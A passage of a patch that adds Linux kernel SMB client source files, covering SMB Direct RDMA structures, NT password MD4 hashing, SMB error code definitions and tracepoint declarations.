++	int max_fragmented_recv_size;
++	int max_fragmented_send_size;
++	int max_receive_size;
++	int keep_alive_interval;
++	int max_readwrite_size;
++	enum keep_alive_status keep_alive_requested;
++	int protocol;
++	atomic_t send_credits;
++	atomic_t receive_credits;
++	int receive_credit_target;
++	int fragment_reassembly_remaining;
++
++	/* Memory registrations */
++	/* Maximum number of RDMA read/write outstanding on this connection */
++	int responder_resources;
++	/* Maximum number of pages in a single RDMA write/read on this connection */
++	int max_frmr_depth;
++	/*
++	 * If payload is less than or equal to the threshold,
++	 * use RDMA send/recv to send upper layer I/O.
++	 * If payload is more than the threshold,
++	 * use RDMA read/write through memory registration for I/O.
++	 */
++	int rdma_readwrite_threshold;
++	enum ib_mr_type mr_type;
++	struct list_head mr_list;
++	spinlock_t mr_list_lock;
++	/* The number of available MRs ready for memory registration */
++	atomic_t mr_ready_count;
++	atomic_t mr_used_count;
++	wait_queue_head_t wait_mr;
++	struct work_struct mr_recovery_work;
++	/* Used by transport to wait until all MRs are returned */
++	wait_queue_head_t wait_for_mr_cleanup;
++
++	/* Activity accoutning */
++	atomic_t send_pending;
++	wait_queue_head_t wait_send_pending;
++	wait_queue_head_t wait_post_send;
++
++	/* Receive queue */
++	struct list_head receive_queue;
++	int count_receive_queue;
++	spinlock_t receive_queue_lock;
++
++	struct list_head empty_packet_queue;
++	int count_empty_packet_queue;
++	spinlock_t empty_packet_queue_lock;
++
++	wait_queue_head_t wait_receive_queues;
++
++	/* Reassembly queue */
++	struct list_head reassembly_queue;
++	spinlock_t reassembly_queue_lock;
++	wait_queue_head_t wait_reassembly_queue;
++
++	/* total data length of reassembly queue */
++	int reassembly_data_length;
++	int reassembly_queue_length;
++	/* the offset to first buffer in reassembly queue */
++	int first_entry_offset;
++
++	bool send_immediate;
++
++	wait_queue_head_t wait_send_queue;
++
++	/*
++	 * Indicate if we have received a full packet on the connection
++	 * This is used to identify the first SMBD packet of a assembled
++	 * payload (SMB packet) in reassembly queue so we can return a
++	 * RFC1002 length to upper layer to indicate the length of the SMB
++	 * packet received
++	 */
++	bool full_packet_received;
++
++	struct workqueue_struct *workqueue;
++	struct delayed_work idle_timer_work;
++
++	/* Memory pool for preallocating buffers */
++	/* request pool for RDMA send */
++	struct kmem_cache *request_cache;
++	mempool_t *request_mempool;
++
++	/* response pool for RDMA receive */
++	struct kmem_cache *response_cache;
++	mempool_t *response_mempool;
++
++	/* for debug purposes */
++	unsigned int count_get_receive_buffer;
++	unsigned int count_put_receive_buffer;
++	unsigned int count_reassembly_queue;
++	unsigned int count_enqueue_reassembly_queue;
++	unsigned int count_dequeue_reassembly_queue;
++	unsigned int count_send_empty;
++};
++
++enum smbd_message_type {
++	SMBD_NEGOTIATE_RESP,
++	SMBD_TRANSFER_DATA,
++};
++
++#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
++
++/* SMBD negotiation request packet [MS-SMBD] 2.2.1 */
++struct smbd_negotiate_req {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMBD negotiation response packet [MS-SMBD] 2.2.2 */
++struct smbd_negotiate_resp {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 negotiated_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le32 status;
++	__le32 max_readwrite_size;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMBD data transfer packet with payload [MS-SMBD] 2.2.3 */
++struct smbd_data_transfer {
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le16 flags;
++	__le16 reserved;
++	__le32 remaining_data_length;
++	__le32 data_offset;
++	__le32 data_length;
++	__le32 padding;
++	__u8 buffer[];
++} __packed;
++
++/* The packet fields for a registered RDMA buffer */
++struct smbd_buffer_descriptor_v1 {
++	__le64 offset;
++	__le32 token;
++	__le32 length;
++} __packed;
++
++/* Maximum number of SGEs used by smbdirect.c in any send work request */
++#define SMBDIRECT_MAX_SEND_SGE	6
++
++/* The context for a SMBD request */
++struct smbd_request {
++	struct smbd_connection *info;
++	struct ib_cqe cqe;
++
++	/* the SGE entries for this work request */
++	struct ib_sge sge[SMBDIRECT_MAX_SEND_SGE];
++	int num_sge;
++
++	/* SMBD packet header follows this structure */
++	u8 packet[];
++};
++
++/* Maximum number of SGEs used by smbdirect.c in any receive work request */
++#define SMBDIRECT_MAX_RECV_SGE	1
++
++/* The context for a SMBD response */
++struct smbd_response {
++	struct smbd_connection *info;
++	struct ib_cqe cqe;
++	struct ib_sge sge;
++
++	enum smbd_message_type type;
++
++	/* Link to receive queue or reassembly queue */
++	struct list_head list;
++
++	/* Indicate if this is the 1st packet of a payload */
++	bool first_segment;
++
++	/* SMBD packet header and payload follows this structure */
++	u8 packet[];
++};
++
++/* Create a SMBDirect session */
++struct smbd_connection *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr);
++
++/* Reconnect SMBDirect session */
++int smbd_reconnect(struct TCP_Server_Info *server);
++/* Destroy SMBDirect session */
++void smbd_destroy(struct TCP_Server_Info *server);
++
++/* Interface for carrying upper layer I/O through send/recv */
++int smbd_recv(struct smbd_connection *info, struct msghdr *msg);
++int smbd_send(struct TCP_Server_Info *server,
++	int num_rqst, struct smb_rqst *rqst);
++
++enum mr_state {
++	MR_READY,
++	MR_REGISTERED,
++	MR_INVALIDATED,
++	MR_ERROR
++};
++
++struct smbd_mr {
++	struct smbd_connection	*conn;
++	struct list_head	list;
++	enum mr_state		state;
++	struct ib_mr		*mr;
++	struct scatterlist	*sgl;
++	int			sgl_count;
++	enum dma_data_direction	dir;
++	union {
++		struct ib_reg_wr	wr;
++		struct ib_send_wr	inv_wr;
++	};
++	struct ib_cqe		cqe;
++	bool			need_invalidate;
++	struct completion	invalidate_done;
++};
++
++/* Interfaces to register and deregister MR for RDMA read/write */
++struct smbd_mr *smbd_register_mr(
++	struct smbd_connection *info, struct page *pages[], int num_pages,
++	int offset, int tailsz, bool writing, bool need_invalidate);
++int smbd_deregister_mr(struct smbd_mr *mr);
++
++#else
++#define cifs_rdma_enabled(server)	0
++struct smbd_connection {};
++static inline void *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr) {return NULL;}
++static inline int smbd_reconnect(struct TCP_Server_Info *server) {return -1; }
++static inline void smbd_destroy(struct TCP_Server_Info *server) {}
++static inline int smbd_recv(struct smbd_connection *info, struct msghdr *msg) {return -1; }
++static inline int smbd_send(struct TCP_Server_Info *server, int num_rqst, struct smb_rqst *rqst) {return -1; }
++#endif
++
++#endif
+diff --git a/fs/smb/client/smbencrypt.c b/fs/smb/client/smbencrypt.c
+new file mode 100644
+index 0000000000000..f0ce26414f173
+--- /dev/null
++++ b/fs/smb/client/smbencrypt.c
+@@ -0,0 +1,91 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++   Unix SMB/Netbios implementation.
++   Version 1.9.
++   SMB parameters and setup
++   Copyright (C) Andrew Tridgell 1992-2000
++   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++   Modified by Jeremy Allison 1995.
++   Copyright (C) Andrew Bartlett <abartlet@samba.org> 2002-2003
++   Modified by Steve French (sfrench@us.ibm.com) 2002-2003
++
++*/
++
++#include <linux/module.h>
++#include <linux/slab.h>
++#include <linux/fips.h>
++#include <linux/fs.h>
++#include <linux/string.h>
++#include <linux/kernel.h>
++#include <linux/random.h>
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "../common/md4.h"
++
++#ifndef false
++#define false 0
++#endif
++#ifndef true
++#define true 1
++#endif
++
++/* following came from the other byteorder.h to avoid include conflicts */
++#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])
++#define SSVALX(buf,pos,val) (CVAL(buf,pos)=(val)&0xFF,CVAL(buf,pos+1)=(val)>>8)
++#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((__u16)(val)))
++
++/* produce a md4 message digest from data of length n bytes */
++static int
++mdfour(unsigned char *md4_hash, unsigned char *link_str, int link_len)
++{
++	int rc;
++	struct md4_ctx mctx;
++
++	rc = cifs_md4_init(&mctx);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init MD4\n", __func__);
++		goto mdfour_err;
++	}
++	rc = cifs_md4_update(&mctx, link_str, link_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update MD4\n", __func__);
++		goto mdfour_err;
++	}
++	rc = cifs_md4_final(&mctx, md4_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not finalize MD4\n", __func__);
++
++
++mdfour_err:
++	return rc;
++}
++
++/*
++ * Creates the MD4 Hash of the users password in NT UNICODE.
++ */
++
++int
++E_md4hash(const unsigned char *passwd, unsigned char *p16,
++	const struct nls_table *codepage)
++{
++	int rc;
++	int len;
++	__le16 wpwd[129];
++
++	/* Password cannot be longer than 128 characters */
++	if (passwd) /* Password must be converted to NT unicode */
++		len = cifs_strtoUTF16(wpwd, passwd, 128, codepage);
++	else {
++		len = 0;
++		*wpwd = 0; /* Ensure string is null terminated */
++	}
++
++	rc = mdfour(p16, (unsigned char *) wpwd, len * sizeof(__le16));
++	memzero_explicit(wpwd, sizeof(wpwd));
++
++	return rc;
++}
+diff --git a/fs/smb/client/smberr.h b/fs/smb/client/smberr.h
+new file mode 100644
+index 0000000000000..aeffdad829e2e
+--- /dev/null
++++ b/fs/smb/client/smberr.h
+@@ -0,0 +1,171 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   See Error Codes section of the SNIA CIFS Specification
++ *   for more information
++ *
++ */
++
++#define SUCCESS	0x00	/* The request was successful. */
++#define ERRDOS	0x01	/* Error is from the core DOS operating system set */
++#define ERRSRV	0x02	/* Error is generated by the file server daemon */
++#define ERRHRD	0x03	/* Error is a hardware error. */
++#define ERRCMD	0xFF	/* Command was not in the "SMB" format. */
++
++/* The following error codes may be generated with the SUCCESS error class.*/
++
++/*#define SUCCESS	0	The request was successful. */
++
++/* The following error codes may be generated with the ERRDOS error class.*/
++
++#define ERRbadfunc		1	/* Invalid function. The server did not
++					   recognize or could not perform a
++					   system call generated by the server,
++					   e.g., set the DIRECTORY attribute on
++					   a data file, invalid seek mode. */
++#define ERRbadfile		2	/* File not found. The last component
++					   of a file's pathname could not be
++					   found. */
++#define ERRbadpath		3	/* Directory invalid. A directory
++					   component in a pathname could not be
++					   found. */
++#define ERRnofids		4	/* Too many open files. The server has
++					   no file handles available. */
++#define ERRnoaccess		5	/* Access denied, the client's context
++					   does not permit the requested
++					   function. This includes the
++					   following conditions: invalid rename
++					   command, write to Fid open for read
++					   only, read on Fid open for write
++					   only, attempt to delete a non-empty
++					   directory */
++#define ERRbadfid		6	/* Invalid file handle. The file handle
++					   specified was not recognized by the
++					   server. */
++#define ERRbadmcb		7	/* Memory control blocks destroyed. */
++#define ERRnomem		8	/* Insufficient server memory to
++					   perform the requested function. */
++#define ERRbadmem		9	/* Invalid memory block address. */
++#define ERRbadenv		10	/* Invalid environment. */
++#define ERRbadformat		11	/* Invalid format. */
++#define ERRbadaccess		12	/* Invalid open mode. */
++#define ERRbaddata		13	/* Invalid data (generated only by
++					   IOCTL calls within the server). */
++#define ERRbaddrive		15	/* Invalid drive specified. */
++#define ERRremcd		16	/* A Delete Directory request attempted
++					   to remove the server's current
++					   directory. */
++#define ERRdiffdevice		17	/* Not same device (e.g., a cross
++					   volume rename was attempted */
++#define ERRnofiles		18	/* A File Search command can find no
++					   more files matching the specified
++					   criteria. */
++#define ERRwriteprot		19	/* media is write protected */
++#define ERRgeneral		31
++#define ERRbadshare		32	/* The sharing mode specified for an
++					   Open conflicts with existing FIDs on
++					   the file. */
++#define ERRlock			33	/* A Lock request conflicted with an
++					   existing lock or specified an
++					   invalid mode, or an Unlock requested
++					   attempted to remove a lock held by
++					   another process. */
++#define ERRunsup		50
++#define ERRnosuchshare		67
++#define ERRfilexists		80	/* The file named in the request
++					   already exists. */
++#define ERRinvparm		87
++#define ERRdiskfull		112
++#define ERRinvname		123
++#define ERRinvlevel		124
++#define ERRdirnotempty		145
++#define ERRnotlocked		158
++#define ERRcancelviolation	173
++#define ERRalreadyexists	183
++#define ERRbadpipe		230
++#define ERRpipebusy		231
++#define ERRpipeclosing		232
++#define ERRnotconnected		233
++#define ERRmoredata		234
++#define ERReasnotsupported	282
++#define ErrQuota		0x200	/* The operation would cause a quota
++					   limit to be exceeded. */
++#define ErrNotALink		0x201	/* A link operation was performed on a
++					   pathname that was not a link. */
++
++/* Below errors are used internally (do not come over the wire) for passthrough
++   from STATUS codes to POSIX only  */
++#define ERRsymlink              0xFFFD
++#define ErrTooManyLinks         0xFFFE
++
++/* Following error codes may be generated with the ERRSRV error class.*/
++
++#define ERRerror		1	/* Non-specific error code. It is
++					   returned under the following
++					   conditions: resource other than disk
++					   space exhausted (e.g. TIDs), first
++					   SMB command was not negotiate,
++					   multiple negotiates attempted, and
++					   internal server error. */
++#define ERRbadpw		2	/* Bad password - name/password pair in
++					   a TreeConnect or Session Setup are
++					   invalid. */
++#define ERRbadtype		3	/* used for indicating DFS referral
++					   needed */
++#define ERRaccess		4	/* The client does not have the
++					   necessary access rights within the
++					   specified context for requested
++					   function. */
++#define ERRinvtid		5	/* The Tid specified in a command was
++					   invalid. */
++#define ERRinvnetname		6	/* Invalid network name in tree
++					   connect. */
++#define ERRinvdevice		7	/* Invalid device - printer request
++					   made to non-printer connection or
++					   non-printer request made to printer
++					   connection. */
++#define ERRqfull		49	/* Print queue full (files) -- returned
++					   by open print file. */
++#define ERRqtoobig		50	/* Print queue full -- no space. */
++#define ERRqeof			51	/* EOF on print queue dump */
++#define ERRinvpfid		52	/* Invalid print file FID. */
++#define ERRsmbcmd		64	/* The server did not recognize the
++					   command received. */
++#define ERRsrverror		65	/* The server encountered an internal
++					   error, e.g., system file
++					   unavailable. */
++#define ERRbadBID		66	/* (obsolete) */
++#define ERRfilespecs		67	/* The Fid and pathname parameters
++					   contained an invalid combination of
++					   values. */
++#define ERRbadLink		68	/* (obsolete) */
++#define ERRbadpermits		69	/* The access permissions specified for
++					   a file or directory are not a valid
++					   combination. */
++#define ERRbadPID		70
++#define ERRsetattrmode		71	/* attribute (mode) is invalid */
++#define ERRpaused		81	/* Server is paused */
++#define ERRmsgoff		82	/* reserved - messaging off */
++#define ERRnoroom		83	/* reserved - no room for message */
++#define ERRrmuns		87	/* reserved - too many remote names */
++#define ERRtimeout		88	/* operation timed out */
++#define ERRnoresource		89	/* No resources available for request
++					   */
++#define ERRtoomanyuids		90	/* Too many UIDs active on this session
++					   */
++#define ERRbaduid		91	/* The UID is not known as a valid user
++					   */
++#define ERRusempx		250	/* temporarily unable to use raw */
++#define ERRusestd		251	/* temporarily unable to use either raw
++					   or mpx */
++#define ERR_NOTIFY_ENUM_DIR	1024
++#define ERRnoSuchUser		2238	/* user account does not exist */
++#define ERRaccountexpired	2239
++#define ERRbadclient		2240	/* can not logon from this client */
++#define ERRbadLogonTime		2241	/* logon hours do not allow this */
++#define ERRpasswordExpired	2242
++#define ERRnetlogonNotStarted	2455
++#define ERRnosupport		0xFFFF
+diff --git a/fs/smb/client/trace.c b/fs/smb/client/trace.c
+new file mode 100644
+index 0000000000000..4654837871934
+--- /dev/null
++++ b/fs/smb/client/trace.c
+@@ -0,0 +1,8 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *   Copyright (C) 2018, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ */
++#define CREATE_TRACE_POINTS
++#include "trace.h"
+diff --git a/fs/smb/client/trace.h b/fs/smb/client/trace.h
+new file mode 100644
+index 0000000000000..d3053bd8ae731
+--- /dev/null
++++ b/fs/smb/client/trace.h
+@@ -0,0 +1,1070 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ *   Copyright (C) 2018, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ */
++#undef TRACE_SYSTEM
++#define TRACE_SYSTEM cifs
++
++#if !defined(_CIFS_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
++#define _CIFS_TRACE_H
++
++#include <linux/tracepoint.h>
++#include <linux/net.h>
++#include <linux/inet.h>
++
++/*
++ * Please use this 3-part article as a reference for writing new tracepoints:
++ * https://lwn.net/Articles/379903/
++ */
++
++/* For logging errors in read or write */
++DECLARE_EVENT_CLASS(smb3_rw_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset,
++		__u32	len,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, offset, len, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++		__field(__u32, len)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++		__entry->len = len;
++		__entry->rc = rc;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset, __entry->len, __entry->rc)
++)
++
++#define DEFINE_SMB3_RW_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_rw_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset,			\
++		__u32	len,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, offset, len, rc))
++
++DEFINE_SMB3_RW_ERR_EVENT(write_err);
++DEFINE_SMB3_RW_ERR_EVENT(read_err);
++DEFINE_SMB3_RW_ERR_EVENT(query_dir_err);
++DEFINE_SMB3_RW_ERR_EVENT(zero_err);
++DEFINE_SMB3_RW_ERR_EVENT(falloc_err);
++
++
++/* For logging successful read or write */
++DECLARE_EVENT_CLASS(smb3_rw_done_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset,
++		__u32	len),
++	TP_ARGS(xid, fid, tid, sesid, offset, len),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++		__field(__u32, len)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++		__entry->len = len;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset, __entry->len)
++)
++
++#define DEFINE_SMB3_RW_DONE_EVENT(name)         \
++DEFINE_EVENT(smb3_rw_done_class, smb3_##name,   \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset,			\
++		__u32	len),			\
++	TP_ARGS(xid, fid, tid, sesid, offset, len))
++
++DEFINE_SMB3_RW_DONE_EVENT(write_enter);
++DEFINE_SMB3_RW_DONE_EVENT(read_enter);
++DEFINE_SMB3_RW_DONE_EVENT(query_dir_enter);
++DEFINE_SMB3_RW_DONE_EVENT(zero_enter);
++DEFINE_SMB3_RW_DONE_EVENT(falloc_enter);
++DEFINE_SMB3_RW_DONE_EVENT(write_done);
++DEFINE_SMB3_RW_DONE_EVENT(read_done);
++DEFINE_SMB3_RW_DONE_EVENT(query_dir_done);
++DEFINE_SMB3_RW_DONE_EVENT(zero_done);
++DEFINE_SMB3_RW_DONE_EVENT(falloc_done);
++
++/* For logging successful set EOF (truncate) */
++DECLARE_EVENT_CLASS(smb3_eof_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u64	offset),
++	TP_ARGS(xid, fid, tid, sesid, offset),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, offset)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->offset = offset;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->offset)
++)
++
++#define DEFINE_SMB3_EOF_EVENT(name)         \
++DEFINE_EVENT(smb3_eof_class, smb3_##name,   \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	offset),		\
++	TP_ARGS(xid, fid, tid, sesid, offset))
++
++DEFINE_SMB3_EOF_EVENT(set_eof);
++
++/*
++ * For handle based calls other than read and write, and get/set info
++ */
++DECLARE_EVENT_CLASS(smb3_fd_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid),
++	TP_ARGS(xid, fid, tid, sesid),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid)
++)
++
++#define DEFINE_SMB3_FD_EVENT(name)          \
++DEFINE_EVENT(smb3_fd_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid),			\
++	TP_ARGS(xid, fid, tid, sesid))
++
++DEFINE_SMB3_FD_EVENT(flush_enter);
++DEFINE_SMB3_FD_EVENT(flush_done);
++DEFINE_SMB3_FD_EVENT(close_enter);
++DEFINE_SMB3_FD_EVENT(close_done);
++DEFINE_SMB3_FD_EVENT(oplock_not_found);
++
++DECLARE_EVENT_CLASS(smb3_fd_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->rc = rc;
++	),
++	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->rc)
++)
++
++#define DEFINE_SMB3_FD_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_fd_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, rc))
++
++DEFINE_SMB3_FD_ERR_EVENT(flush_err);
++DEFINE_SMB3_FD_ERR_EVENT(lock_err);
++DEFINE_SMB3_FD_ERR_EVENT(close_err);
++
++/*
++ * For handle based query/set info calls
++ */
++DECLARE_EVENT_CLASS(smb3_inf_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u8	infclass,
++		__u32	type),
++	TP_ARGS(xid, fid, tid, sesid, infclass, type),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u8, infclass)
++		__field(__u32, type)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->infclass = infclass;
++		__entry->type = type;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->infclass, __entry->type)
++)
++
++#define DEFINE_SMB3_INF_ENTER_EVENT(name)          \
++DEFINE_EVENT(smb3_inf_enter_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u8	infclass,		\
++		__u32	type),			\
++	TP_ARGS(xid, fid, tid, sesid, infclass, type))
++
++DEFINE_SMB3_INF_ENTER_EVENT(query_info_enter);
++DEFINE_SMB3_INF_ENTER_EVENT(query_info_done);
++DEFINE_SMB3_INF_ENTER_EVENT(notify_enter);
++DEFINE_SMB3_INF_ENTER_EVENT(notify_done);
++
++DECLARE_EVENT_CLASS(smb3_inf_err_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		__u8	infclass,
++		__u32	type,
++		int	rc),
++	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u8, infclass)
++		__field(__u32, type)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->infclass = infclass;
++		__entry->type = type;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->infclass, __entry->type, __entry->rc)
++)
++
++#define DEFINE_SMB3_INF_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_inf_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u8	infclass,		\
++		__u32	type,			\
++		int	rc),			\
++	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc))
++
++DEFINE_SMB3_INF_ERR_EVENT(query_info_err);
++DEFINE_SMB3_INF_ERR_EVENT(set_info_err);
++DEFINE_SMB3_INF_ERR_EVENT(notify_err);
++DEFINE_SMB3_INF_ERR_EVENT(fsctl_err);
++
++DECLARE_EVENT_CLASS(smb3_inf_compound_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *full_path),
++	TP_ARGS(xid, tid, sesid, full_path),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(path, full_path)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(path, full_path);
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__get_str(path))
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_enter_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *full_path),		\
++	TP_ARGS(xid, tid, sesid, full_path))
++
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(query_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(posix_query_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(hardlink_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rename_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rmdir_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_eof_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_info_compound_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(delete_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(mkdir_enter);
++DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(tdis_enter);
++
++
++DECLARE_EVENT_CLASS(smb3_inf_compound_done_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid),
++	TP_ARGS(xid, tid, sesid),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid)
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_done_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid),			\
++	TP_ARGS(xid, tid, sesid))
++
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(query_info_compound_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(posix_query_info_compound_done);
